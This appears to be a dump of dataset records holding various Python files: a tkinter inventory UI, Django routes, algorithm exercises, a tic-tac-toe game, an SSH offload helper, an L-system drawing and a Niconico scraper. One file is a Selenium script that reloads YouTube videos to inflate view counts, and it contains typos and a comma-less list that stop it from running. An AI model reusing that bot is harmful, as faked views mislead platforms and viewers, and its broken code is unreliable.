row in data]\r\n \r\n # Define colores, Los colores por defecto no eran suficientes y se repetian\r\n custom_colors = [\r\n 'skyblue', 'orange', 'green', 'coral',\r\n 'lightskyblue', 'pink', 'gray', 'gold',\r\n 'seagreen', 'blue', 'lightyellow', 'salmon',\r\n 'steelblue', 'plum', 'green', 'lightcoral']\r\n\r\n\r\n # Crea pieChart con las labels como valores enteros en vez de %\r\n plt.pie(counts, labels=None, autopct=lambda pct: f'{int(pct / 100 * sum(counts))}', startangle=90, colors=custom_colors)\r\n\r\n # Agrega las Labels al costado del grafico y titulo categorias\r\n plt.legend(types, title='Tipo de Instrumento', loc='center left', bbox_to_anchor=(1, 0.5))\r\n\r\n \r\n # Titulo de ventana\r\n plt.title('Stock Central Instrumentos')\r\n plt.show()\r\n\r\n\r\ndef grafico_prestamos(data):\r\n print(\"grafico_prestamos llamado\")\r\n \r\n tab5_anho = tab5_combo_anho.get()\r\n tab5_mes = tab5_combo_mes.get()\r\n \r\n \r\n instrument_names, lending_counts = zip(*data)\r\n \r\n \r\n plt.figure(figsize=(8, 5))\r\n \r\n plt.bar(instrument_names, lending_counts, color='blue')\r\n \r\n string_titulo_grafico_prestamos = f\"Cantidad de prestamos en {tab5_anho}-{tab5_mes}\"\r\n plt.title(string_titulo_grafico_prestamos)\r\n plt.xlabel('Tipo de Instrumento')\r\n plt.ylabel('Cantidad de Prestamos')\r\n plt.xticks(rotation=45, ha='right')\r\n \r\n plt.yticks(range(max(lending_counts) + 1)) # Hace eje vertical tener valores enteros\r\n\r\n \r\n plt.tight_layout()\r\n plt.show()\r\n \r\n\r\n\r\n# ### Elementos UI de pestana 5.\r\n\r\n# GRAFICO 1\r\n\r\ntab5_label_descripcion_grafico1 = ttk.Label(\r\n tab5,\r\n text=\"Visualizar Stock Central de Instrumentos\",\r\n font=(\"BlinkMacSystemFont\", 9, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n\r\ntab5_label_descripcion_grafico1.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n\r\ntab5_btn_stock = ttk.Button(tab5, text=\"Visualizar Stock\", command=query_graficar_stock, width=25)\r\ntab5_btn_stock.grid(row=2, column=0, padx=25, pady=(0, 15))\r\n\r\n# GRAFICO 2 \r\n\r\ntab5_label_descripcion_grafico2 = ttk.Label(\r\n tab5,\r\n text=\"Visualizar Prestamos Central de Instrumentos\",\r\n font=(\"BlinkMacSystemFont\", 9, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n\r\ntab5_label_descripcion_grafico2.grid(row=3, column=0, padx=10, pady=10, columnspan=20)\r\n\r\ntab5_anho_valores = [\"2023\", \"2022\", \"2021\", \"2020\"]\r\ntab5_mes_valores = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", 
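Two fragile details in the charts above: the pie labels reconstruct each count from its percentage, which can round to the wrong integer for close slices, and plt.yticks(range(max + 1)) draws one tick per unit, which becomes unreadable once counts grow. A sketch of both fixes using matplotlib's stock MaxNLocator; the function name is new.

import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator

def grafico_prestamos_enteros(data):
    if not data:  # zip(*data) would raise on an empty result set
        return
    instrument_names, lending_counts = zip(*data)
    fig, ax = plt.subplots(figsize=(8, 5))
    ax.bar(instrument_names, lending_counts, color='blue')
    ax.yaxis.set_major_locator(MaxNLocator(integer=True))  # integer ticks at any scale
    ax.set_xlabel('Tipo de Instrumento')
    ax.set_ylabel('Cantidad de Prestamos')
    plt.xticks(rotation=45, ha='right')
    plt.tight_layout()
    plt.show()

# For the pie chart, putting the exact counts in the legend sidesteps the
# percentage round-trip entirely:
# plt.legend([f'{t} ({c})' for t, c in zip(types, counts)], title='Tipo de Instrumento')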
\"12\"]\r\n\r\ntab5_combo_anho = ttk.Combobox(tab5, values=tab5_anho_valores, width=10)\r\ntab5_combo_anho.grid(row=4, column=0, padx=(10,100), pady=(0,10))\r\n\r\ntab5_combo_mes = ttk.Combobox(tab5, values=tab5_mes_valores, width=10)\r\ntab5_combo_mes.grid(row=4, column=0, padx=(85,0), pady=(0,10))\r\n\r\ntab5_btn_prestamos = ttk.Button(tab5, text=\"Visualizar Prestamos\", command=query_graficar_prestamos, width=25)\r\ntab5_btn_prestamos.grid(row=5, column=0, padx=(0,0), pady=(0, 0))\r\n\r\n\r\n\r\n\r\n\r\n\r\n# ### Fin codigo, Las lineas siguientes tienen que estar al final del archivo para que funcione correctamente.\r\n\r\n# Inicia y refresca la ventana de la UI.\r\nroot.mainloop()\r\n\r\n# Cierra la connection y el cursor al salir de la aplicación.\r\n\r\ncrsr.close()\r\nconnection.close()\r\n","repo_name":"MatiasRGT/BaseDatos1_uni","sub_path":"Instrumentos_DB.py","file_name":"Instrumentos_DB.py","file_ext":"py","file_size_in_byte":60436,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18258400190","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Refbooks API\",\n default_version='v1',\n description=\"Сервис терминологии\",\n ),\n patterns=[path('refbooks/', include('med_catalog.urls')),],\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path(\n 'docs/',\n schema_view.with_ui('swagger', cache_timeout=0),\n name='schema-swagger-ui'\n ),\n path('admin/', admin.site.urls),\n path('refbooks/', include('med_catalog.urls')),\n]\n","repo_name":"daria-z7/med_catalog_api","sub_path":"med_service/med_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526173797","text":"'''\nLongest decreasing subsequence\n\nGiven array of ints, find the longest subsequence that has all values in increasing order.\nAlso return the values themselves.\n\nExamples:\nInput: arr[] = [15, 27, 14, 38, 63, 55, 46, 65, 85]\nOutput: 3\nExplanation: The longest decreasing sub sequence is [63, 55, 46]\n\nInput: arr[] = [50, 3, 10, 7, 40, 80]\nOutput: 3\nExplanation: The longest decreasing subsequence is [50, 10, 7]\n\nhttps://www.geeksforgeeks.org/longest-decreasing-subsequence/\n'''\n\nclass Prob:\n @staticmethod\n def longestDecreasingSubsequence(array):\n # store longest decreasing subsequence up to a val in the input array.\n longestUpToVal = [1 for _ in array]\n \n # store index of the previous number in longest decreasing subsequence.\n longestDecIndices = [None for _ in array]\n \n # store the index of the longest decreasing subsequence count so far\n longestSeqInd = 0\n \n for i in range(len(array)):\n inputVal = array[i]\n \n for j in range(0,i):\n upToVal = array[j]\n \n if upToVal > inputVal and longestUpToVal[j]+1 > longestUpToVal[i]:\n longestUpToVal[i] = longestUpToVal[j]+1\n longestDecIndices[i] = j\n print(\"longestUpToVal: \", longestUpToVal)\n \n if longestUpToVal[i] > longestUpToVal[longestSeqInd]:\n longestSeqInd = i\n \n longestSubseq = []\n tmpInd = longestSeqInd\n while tmpInd != None:\n longestSubseq.insert(0, array[tmpInd])\n tmpInd = longestDecIndices[tmpInd]\n \n return [max(longestUpToVal), longestSubseq]\n \n @staticmethod\n def test1():\n #array = [50, 3, 
10, 7, 40, 80]\n array = [15, 27, 14, 38, 63, 55, 46, 65, 85]\n ans = Prob.longestDecreasingSubsequence(array)\n print(\"test1: ans: \", ans)\n\nProb.test1()\n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/longest_decreasing_subsequence.py","file_name":"longest_decreasing_subsequence.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"45584305038","text":"# DRL-5G-Scheduler; Author: Zhouyou Gu (zhouyou.gu@sydney.edu.au);\n# Supervisors: Wibowo Hardjawana; Branka Vucetic;\n# This project is developed at Centre for IoT and Telecommunications at The University of Sydney,\n# under a project directly funded by Telstra Corporation Ltd., titled\n# ”Development of an Open Programmable Scheduler for LTE Networks”, from 2018 to 2019.\n# Reference: Z. Gu, C. She, W. Hardjawana, S. Lumb, D. McKechnie, T. Essery, and B. Vucetic,\n# “Knowledge-assisted deep reinforcement learning in 5G scheduler design:\n# From theoretical framework to implementation,” IEEE JSAC., to appear, 2021\n\nimport os\n\nfrom sim_src.sim_helper.event_to_csv import EventToCsvHandler\n\nn_ue = 2\nscalar_list = []\nfor k in range(n_ue):\n scalar = 'ue' + str(k + 1) + '_Latency_ms'\n scalar_list.append(scalar)\n\nevent = [os.path.join(os.path.dirname(os.path.abspath(__file__)), 'online')]\ne = EventToCsvHandler(event_dir=event, dir_pattern='*', scalar_list=scalar_list)\n","repo_name":"zhouyou-gu/drl-5g-scheduler","sub_path":"controller_src/exp_script_example/process_tb_data.py","file_name":"process_tb_data.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"9223268377","text":"from Grid import Grid\nfrom Grid import State\n\nBOARD_SIZE = 3\nINPUT_ERR_MSG = \"'%s' is not a valid position!\"\nINPUT_PROMPT_MSG = \"Enter a number (1-9) to put an %s or type 'exit' to quit the program. 
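The dynamic-programming solution above is O(n^2). When only the length is needed, the classic patience-sorting variant runs in O(n log n): negating the values turns the longest strictly decreasing subsequence into a longest strictly increasing one. A sketch, checked against both docstring examples:

from bisect import bisect_left

def longest_decreasing_length(array):
    # tails[i] holds the smallest possible tail (negated) of an increasing
    # subsequence of length i+1; the final length of tails is the answer.
    tails = []
    for value in array:
        x = -value  # strictly decreasing in array == strictly increasing here
        i = bisect_left(tails, x)
        if i == len(tails):
            tails.append(x)
        else:
            tails[i] = x
    return len(tails)

assert longest_decreasing_length([15, 27, 14, 38, 63, 55, 46, 65, 85]) == 3
assert longest_decreasing_length([50, 3, 10, 7, 40, 80]) == 3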
\"\nEXIT_FLAG = -1\nMAX_TURNS = 9\n\ndef get_input(mark: State) -> int: \n \"\"\"Gets raw input from cmd.\"\"\"\n user_input = input(INPUT_PROMPT_MSG % mark.name).strip() # Remove extra spaces\n\n if user_input != \"exit\":\n try: \n int_input = int(user_input) - 1\n # Make sure input is in valid range (if, not error raises into our except block)\n assert 0 <= int_input <= 8\n return int_input\n except:\n # Tell them invalid input and do some recursion\n print(INPUT_ERR_MSG % user_input)\n return get_input(mark)\n return EXIT_FLAG # Notify the loop to stop\n\n\ndef detect_win(grid: Grid) -> bool:\n diag_sum = 0\n anti_diag_sum = 0\n\n # Iterate through entire board\n for row in range(grid.size):\n # Initialize our lateral flag\n row_sum = 0\n col_sum = 0\n\n for col in range(grid.size):\n # Since the enum State has -1 for X and 1 for O, we can add the values\n row_sum += grid.get_value((row, col)).value\n col_sum += grid.get_value((col, row)).value\n\n if row == col:\n diag_sum += grid.get_value((row, col)).value\n if row + col == 2:\n anti_diag_sum += grid.get_value((row, col)).value\n\n if grid.size in (abs(row_sum), abs(col_sum), abs(diag_sum), abs(anti_diag_sum)):\n # Someone won the game, the main loop can figure it out\n return True\n return False\n\nreplay_input = \"y\"\n\nwhile replay_input == \"y\":\n\n grid = Grid(BOARD_SIZE)\n current_mark = State.X\n win = False\n user_input = 0 # default to start while loop\n turn_count = 0\n\n while not win and turn_count < MAX_TURNS:\n # Toggle state of the mark\n current_mark = State.X if current_mark == State.O else State.O \n # User Interfacing\n print(grid)\n user_input = get_input(current_mark)\n if user_input == EXIT_FLAG:\n break\n # Applying changes to our grid\n coords = (user_input % grid.size, user_input // grid.size)\n grid.set_value(coords, current_mark)\n win = detect_win(grid)\n turn_count += 1\n\n if user_input == EXIT_FLAG:\n break\n \n print(grid)\n if win:\n print(current_mark.name + \" won the game!\")\n else:\n print(\"It was a draw!\")\n replay_input = input(\"Would you like to play again? 
(y/n)\").strip()\n \n\n ","repo_name":"B-Ricey763/Tic-Tac-Toe-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13627395720","text":"from selenium import webdriver\nimport time\nimport random\n#from webdriver_manager.chrome import ChromeDriverManager\n\n\ndriver = webdriver.Chrome('/Users/radwan/Downloads/chromedriver')\n\nvideos = [\n'https://www.youtube.com/watch?v=diHR3tdK-3g&t=10s'\n'https://www.youtube.com/watch?v=Z0Kef5Z37sQ'\n'https://www.youtube.com/watch?v=M_iauns2AUc'\n'https://www.youtube.com/watch?v=T5t69f4TQu8'\n\n]\n\n\nfor i in range(20):\n\tprint(\"Running the Video for {} time\".format(i))\n\trandom_video = random.randit(0,8)\n\tdriver.get(videos[random_video])\n\tsleep_time = random.rantin(10, 20)\n\ttime.sleep(sleep_time)\n\ndriver.quit()","repo_name":"easytech2/Programmierung","sub_path":"videoviews.py","file_name":"videoviews.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13627072822","text":"import os\nimport numpy as np\nfrom src.features.bahamas import BahamasLoaderPaired\nfrom src.features.transforms import transform_fcs, FCS\nfolder = os.path.basename(os.path.dirname(__file__))\nsubfolder = os.path.splitext(os.path.basename(__file__))[0]\nname = '/' + folder + '/' + subfolder + '/'\n\n# stock adam optimizer options\n\nadam_opts = {\n 'lr': 0.001,\n 'betas': (0.9, 0.999),\n 'eps': 1e-08,\n 'weight_decay': 0,\n 'amsgrad': False\n}\n\n# configuration from stanford tutorial\n\nloss_params = {\n 'd_period': 2,\n 'lambda': 1\n}\n\n\npaper_opts = adam_opts\npaper_opts['betas'] = (0.5, 0.999)\npaper_opts['lr'] = 0.0002\nfrom src.configs.resnet.stock import g_structure\nfrom src.configs.patchgan.stock import d_structure\nepoch_end = 90\n\nschedule = {\n 'type': 'translator',\n 'loss': 'l1_plus',\n 'loss_params': loss_params,\n 'g_optimizer': 'adam',\n 'd_optimizer': 'adam',\n 'g_optim_opts': paper_opts,\n 'd_optim_opts': paper_opts,\n 'sample_interval': 205,\n 'batch_size': 2,\n 'epochs': epoch_end,\n 'save_model_interval': None,\n 'save_img_interval': None,\n 'save_dir': os.getenv('SDIR') + name,\n 'save_summary': {\n 'epochs': np.arange(0, (epoch_end+1), 5).tolist(),\n 'box_size': (100,100),\n 'transform': FCS(k=4, inverse=True),\n 'n': 4,\n 'grid_size': (2,2)\n }\n}\n\n\n\ntrain_loader = BahamasLoaderPaired([os.getenv('D32'), os.getenv('G32')],\n batch_size=schedule['batch_size'],\n ntest=30,\n transform=transform_fcs,\n train_set=True)\n\n\ntest_loader = BahamasLoaderPaired([os.getenv('D32'), os.getenv('G32')],\n batch_size=10,\n ntest=30,\n transform=transform_fcs,\n train_set=False)\n\n","repo_name":"hyferg/painting-with-baryons","sub_path":"src/configs/schedules/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43154826316","text":"from typing import List\n\nimport shlex\nfrom dataclasses import dataclass\nfrom autofarm.jobserver import ExecInvocationParam\nfrom autofarm.models import EnvironmentVariableNotFoundError\nfrom autofarm.offload_command_builder.default import OffloadCommandBuilder\n\n\n@dataclass\nclass SSHCommandBuilder(OffloadCommandBuilder):\n remote_invocation_command: str\n remote_invocation_hosts: List[str]\n remote_invocation_skip_directory_change: bool\n\n # 
Keeps track of which host in the host list is next for offloading. Is incremented before first use\n _remote_host_index = -1\n\n def build_remote_command(self, request):\n remote_command = \"\"\n if not self.remote_invocation_skip_directory_change:\n try:\n remote_command += f'cd {request.getenv(\"PWD\")} && '\n except EnvironmentVariableNotFoundError as e:\n raise EnvironmentVariableNotFoundError(\n 'Cannot determine the current directory because $PWD is missing. '\n 'Turn on \"skip directory change\" if the working directory should be ignored.'\n ) from e\n remote_command += f'exec {shlex.join(request.arguments)}'\n return remote_command\n\n def build_command(self, request: ExecInvocationParam):\n self._remote_host_index = (self._remote_host_index + 1) % len(self.remote_invocation_hosts)\n remote_command = self.build_remote_command(request)\n return ExecInvocationParam(\n self.remote_invocation_command,\n [self.remote_invocation_command,\n self.remote_invocation_hosts[self._remote_host_index],\n remote_command],\n request.environment\n )\n\n\ndef create_ssh(args):\n return SSHCommandBuilder(\n args.remote_shell,\n args.host,\n args.skip_directory_change\n )\n\n\ndef get_ssh_subcommand(subparsers, parent):\n # SSH subcommand\n ssh_subparser = subparsers.add_parser(\n 'ssh', parents=[parent],\n description=\"Offload process invocations to one or more remote computers.\",\n help='Offload process invocations to one or more remote computers.'\n )\n ssh_subparser.set_defaults(offload_command_builder=SSHCommandBuilder)\n ssh_subparser.add_argument(\n '--remote-shell', type=str, default=\"ssh\",\n help='The shell to redirect invoked commands to. Defaults to SSH. '\n 'Make sure that password-less authentication to all hosts is possible.'\n )\n ssh_subparser.add_argument(\n '--host', action='append', default=[], required=True,\n help='Host to offload work to. 
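A quick round-robin check for the builder above, reusing the imports at the top of this file. The constructor call mirrors build_command's own use of ExecInvocationParam(command, arguments, environment); treat it as a sketch, since OffloadCommandBuilder may declare additional dataclass fields not visible in this excerpt.

builder = SSHCommandBuilder(
    remote_invocation_command="ssh",
    remote_invocation_hosts=["node1", "node2"],
    remote_invocation_skip_directory_change=True,  # sidesteps the $PWD lookup
)
request = ExecInvocationParam("echo", ["echo", "hello"], {})
for _ in range(3):
    invocation = builder.build_command(request)
    print(invocation.arguments[1])  # node1, node2, node1: hosts rotate per call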
Specify multiple times to offload work in round-robin schedule.'\n )\n ssh_subparser.add_argument(\n '--skip-directory-change', action='store_true',\n help='Skip the change to the current working directory on the remote host.'\n )\n","repo_name":"Vinpasso/autofarm","sub_path":"autofarm/offload_command_builder/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41859179650","text":"import turtle\n\ndef apply_rules(input_char):\n if input_char == 'F':\n return 'FF'\n elif input_char == 'X':\n return 'F+[[X]-X]-F[-FX]+X'\n else:\n return input_char\n\ndef process_string(old_str):\n new_str = ''\n for char in old_str:\n new_str = new_str + apply_rules(char)\n return new_str\n\ndef create_l_system(num_iters, axiom):\n start_string = axiom\n for i in range(num_iters):\n start_string = process_string(start_string)\n return start_string\n\ndef draw_l_system(turtle, instructions, angle, distance):\n stack = []\n for cmd in instructions:\n if cmd=='F':\n turtle.forward(distance)\n elif cmd=='B':\n turtle.backward(distance)\n elif cmd=='+':\n turtle.right(angle)\n elif cmd=='-':\n turtle.left(angle)\n elif cmd=='[':\n stack.append((turtle.position(), turtle.heading()))\n elif cmd==']':\n position, heading = stack.pop()\n turtle.penup()\n turtle.setposition(position)\n turtle.setheading(heading)\n turtle.pendown()\n\nwindow = turtle.Screen()\nleo = turtle.Turtle()\nleo.speed(0)\n\nl_system = create_l_system(5, \"X\")\ndraw_l_system(leo, l_system, 15, 2)\n\nwindow.exitonclick()\n","repo_name":"tnedr/chat_gpt_projects","sub_path":"fractal_tree.py","file_name":"fractal_tree.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70810425066","text":"import requests\nfrom bs4 import BeautifulSoup, Tag\nimport json\nfrom dataclasses import dataclass\nfrom typing import Literal, Optional, Union, List\nimport re\nfrom urllib.parse import urlparse\n\n\n\"\"\"\n Public APIs\n\"\"\"\n\n\n@dataclass\nclass GetNicoliveProgramNicoliveProgramData:\n name: Optional[str]\n description: Optional[str]\n url: Optional[str]\n thumbnail_url: Optional[List[str]]\n start_date: Optional[str] # ISO8601 timezone-aware datetime string\n end_date: Optional[str] # ISO8601 timezone-aware datetime string\n\n\n@dataclass\nclass GetNicoliveProgramSuccessNicoliveProgramResult:\n result_type: Literal['success']\n data_type: Literal['nicolive_program']\n data: GetNicoliveProgramNicoliveProgramData\n\n\n@dataclass\nclass GetNicoliveProgramInvalidLiveIdOrUrlResult:\n result_type: Literal['invalid_live_id_or_url']\n\n\n@dataclass\nclass GetNicoliveProgramNotFoundResult:\n result_type: Literal['not_found']\n\n\n@dataclass\nclass GetNicoliveProgramMaintenanceResult:\n result_type: Literal['maintenance']\n\n\n@dataclass\nclass GetNicoliveProgramUnknownErrorResult:\n result_type: Literal['unknown_error']\n\n\nGetNicoliveProgramResult = Union[\n GetNicoliveProgramSuccessNicoliveProgramResult,\n GetNicoliveProgramInvalidLiveIdOrUrlResult,\n GetNicoliveProgramNotFoundResult,\n GetNicoliveProgramMaintenanceResult,\n GetNicoliveProgramUnknownErrorResult,\n]\n\n\ndef get_nicolive_program(\n live_id_or_url: str,\n useragent: str,\n) -> GetNicoliveProgramResult:\n nicolive_watch_result = fetch_nicolive_watch(\n live_id_or_url=live_id_or_url,\n useragent=useragent,\n )\n\n if nicolive_watch_result.result_type == 'success':\n if 
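Each rewriting pass above roughly doubles the Fs and quadruples the Xs, so the instruction string grows exponentially; that is why the script draws only 5 iterations with a 2-pixel step. A quick way to gauge the cost before handing the string to the turtle, reusing create_l_system from above:

for n in range(1, 7):
    print(n, len(create_l_system(n, "X")))
# The string grows several-fold per iteration (a few thousand characters by
# n=5), so raise num_iters cautiously.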
nicolive_watch_result.data_type == 'html':\n html = nicolive_watch_result.data.html\n\n name: Optional[str] = None\n description: Optional[str] = None\n url: Optional[str] = None\n thumbnail_url: Optional[List[str]] = None\n\n # start_date, end_date\n # ISO8601 timezone-aware datetime string\n start_date: Optional[str] = None\n end_date: Optional[str] = None\n\n ogp_result = parse_ogp_in_nicolive_watch_html(html=html)\n if ogp_result.result_type == 'success':\n if ogp_result.data_type == 'ogp':\n ogp_data = ogp_result.data\n\n url = ogp_data.url\n\n json_ld_result = parse_json_ld_in_nicolive_watch_html(html=html)\n if json_ld_result.result_type == 'success':\n if json_ld_result.data_type == 'json_ld':\n json_ld_data = json_ld_result.data\n\n name = json_ld_data.name\n description = json_ld_data.description\n thumbnail_url = json_ld_data.thumbnail_url\n start_date = json_ld_data.start_date\n end_date = json_ld_data.end_date\n\n return GetNicoliveProgramSuccessNicoliveProgramResult(\n result_type='success',\n data_type='nicolive_program',\n data=GetNicoliveProgramNicoliveProgramData(\n name=name,\n description=description,\n url=url,\n thumbnail_url=thumbnail_url,\n start_date=start_date,\n end_date=end_date,\n )\n )\n\n elif nicolive_watch_result.result_type == 'invalid_live_id_or_url':\n return GetNicoliveProgramInvalidLiveIdOrUrlResult(\n result_type='invalid_live_id_or_url',\n )\n\n elif nicolive_watch_result.result_type == 'not_found':\n return GetNicoliveProgramNotFoundResult(\n result_type='not_found',\n )\n\n elif nicolive_watch_result.result_type == 'maintenance':\n return GetNicoliveProgramMaintenanceResult(\n result_type='maintenance',\n )\n\n return GetNicoliveProgramUnknownErrorResult(\n result_type='unknown_error',\n )\n\n\n\"\"\"\n Private API: Fetch a watch page HTML\n https://live.nicovideo.jp/watch/{live_id}\n\"\"\"\n\n\n@dataclass\nclass FetchNicoliveWatchSuccessHtmlData:\n html: str\n\n\n@dataclass\nclass FetchNicoliveWatchSuccessHtmlResult:\n result_type: Literal['success']\n data_type: Literal['html']\n data: FetchNicoliveWatchSuccessHtmlData\n\n\n@dataclass\nclass FetchNicoliveWatchInvalidLiveIdOrUrlResult:\n result_type: Literal['invalid_live_id_or_url']\n\n\n@dataclass\nclass FetchNicoliveWatchNotFoundResult:\n result_type: Literal['not_found']\n\n\n@dataclass\nclass FetchNicoliveWatchMaintenanceResult:\n result_type: Literal['maintenance']\n\n\n@dataclass\nclass FetchNicoliveWatchUnknownResult:\n result_type: Literal['unknown']\n\n\nFetchNicoliveWatchResult = Union[\n FetchNicoliveWatchSuccessHtmlResult,\n FetchNicoliveWatchInvalidLiveIdOrUrlResult,\n FetchNicoliveWatchNotFoundResult,\n FetchNicoliveWatchMaintenanceResult,\n FetchNicoliveWatchUnknownResult,\n]\n\n\ndef validate_live_id(live_id: str) -> bool:\n live_id_patterns = [\n r'lv\\d+',\n r'user\\/\\d+',\n r'co\\d+',\n r'ch\\d+',\n ]\n\n for pattern in live_id_patterns:\n if re.fullmatch(pattern, live_id):\n return True\n\n return False\n\n\ndef validate_live_url_and_get_safe_live_id(live_url: str) -> Optional[str]:\n urlp = urlparse(live_url)\n\n if urlp.scheme == 'https' and \\\n urlp.hostname == 'live.nicovideo.jp' and \\\n urlp.path.startswith('/watch/'):\n live_id = urlp.path[7:] # cut \"/watch/\"\n if validate_live_id(live_id=live_id):\n return live_id\n\n return None\n\n\ndef fetch_nicolive_watch(\n live_id_or_url: str,\n useragent: str,\n) -> FetchNicoliveWatchResult:\n # validate live_id\n safe_live_id = None\n\n is_live_id = False\n if validate_live_id(live_id=live_id_or_url):\n is_live_id = True\n 
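# Illustrative aside (added commentary, not in the original source): given the regex patterns above, bare ids validate directly while watch URLs are reduced to an id first, e.g.\n#   validate_live_id('lv123456')  -> True\n#   validate_live_id('co1234')    -> True\n#   validate_live_url_and_get_safe_live_id('https://live.nicovideo.jp/watch/lv123456')  -> 'lv123456'\n#   validate_live_url_and_get_safe_live_id('https://example.com/watch/lv1')             -> None\n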
safe_live_id = live_id_or_url\n\n is_live_url = False\n if not is_live_id:\n result = validate_live_url_and_get_safe_live_id(live_url=live_id_or_url)\n if result is not None:\n is_live_url = True\n safe_live_id = result\n\n if not is_live_id and not is_live_url:\n return FetchNicoliveWatchInvalidLiveIdOrUrlResult(\n result_type='invalid_live_id_or_url',\n )\n\n assert safe_live_id is not None\n\n headers = {\n 'User-Agent': useragent,\n }\n\n res = requests.get(\n f'https://live.nicovideo.jp/watch/{safe_live_id}',\n headers=headers,\n )\n status_code = res.status_code\n if status_code == 200:\n html = res.text\n\n return FetchNicoliveWatchSuccessHtmlResult(\n result_type='success',\n data_type='html',\n data=FetchNicoliveWatchSuccessHtmlData(\n html=html,\n ),\n )\n\n elif status_code == 404:\n return FetchNicoliveWatchNotFoundResult(\n result_type='not_found',\n )\n\n elif status_code == 500:\n return FetchNicoliveWatchMaintenanceResult(\n result_type='maintenance',\n )\n\n return FetchNicoliveWatchUnknownResult(\n result_type='unknown',\n )\n\n\n\"\"\"\n Private API: Parse a live url in a watch page HTML\n https://live.nicovideo.jp/watch/{live_id}\n\"\"\"\n\n\n@dataclass\nclass ParseOgpInNicoliveWatchHtmlSuccessOgpData:\n url: Optional[str]\n\n\n@dataclass\nclass ParseOgpInNicoliveWatchHtmlSuccessOgpResult:\n result_type: Literal['success']\n data_type: Literal['ogp']\n data: ParseOgpInNicoliveWatchHtmlSuccessOgpData\n\n\n@dataclass\nclass ParseOgpInNicoliveWatchHtmlUnknownErrorResult:\n result_type: Literal['unknown_error']\n\n\nParseOgpInNicoliveWatchHtmlResult = Union[\n ParseOgpInNicoliveWatchHtmlSuccessOgpResult,\n ParseOgpInNicoliveWatchHtmlUnknownErrorResult,\n]\n\n\ndef parse_ogp_in_nicolive_watch_html(\n html: str,\n) -> ParseOgpInNicoliveWatchHtmlResult:\n bs = BeautifulSoup(html, 'html5lib')\n\n og_url_tag = bs.find('meta', attrs={'property': 'og:url', 'content': True})\n url = og_url_tag['content'] if isinstance(og_url_tag, Tag) else None\n if isinstance(url, list):\n url = url[0]\n\n return ParseOgpInNicoliveWatchHtmlSuccessOgpResult(\n result_type='success',\n data_type='ogp',\n data=ParseOgpInNicoliveWatchHtmlSuccessOgpData(\n url=url,\n ),\n )\n\n\n\"\"\"\n Private API: Parse a json-ld in a watch page HTML\n https://live.nicovideo.jp/watch/{live_id}\n\"\"\"\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdData:\n name: Optional[str]\n description: Optional[str]\n thumbnail_url: Optional[List[str]]\n start_date: Optional[str] # ISO8601 timezone-aware datetime string\n end_date: Optional[str] # ISO8601 timezone-aware datetime string\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdResult:\n result_type: Literal['success']\n data_type: Literal['json_ld']\n data: ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdData\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlNotFoundResult:\n result_type: Literal['not_found']\n\n\n@dataclass\nclass ParseJsonLdInNicoliveWatchHtmlUnknownErrorResult:\n result_type: Literal['unknown_error']\n\n\nParseJsonLdInNicoliveWatchHtmlResult = Union[\n ParseJsonLdInNicoliveWatchHtmlSuccessJsonLdResult,\n ParseJsonLdInNicoliveWatchHtmlNotFoundResult,\n ParseJsonLdInNicoliveWatchHtmlUnknownErrorResult,\n]\n\n\ndef parse_json_ld_in_nicolive_watch_html(\n html: str,\n) -> ParseJsonLdInNicoliveWatchHtmlResult:\n bs = BeautifulSoup(html, 'html5lib')\n\n json_ld_tag = bs.find('script', attrs={'type': 'application/ld+json'})\n if not isinstance(json_ld_tag, Tag):\n return ParseJsonLdInNicoliveWatchHtmlNotFoundResult(\n 
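# Hedged sketch (added note; key names are taken from the parsing code just below, the exact payload shape is an assumption): the watch page's <script type=\"application/ld+json\"> tag is expected to carry roughly\n#   {\"name\": ..., \"description\": ..., \"thumbnailUrl\": [...], \"publication\": {\"startDate\": ..., \"endDate\": ...}}\n# so a missing tag here means none of those fields can be recovered.\n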
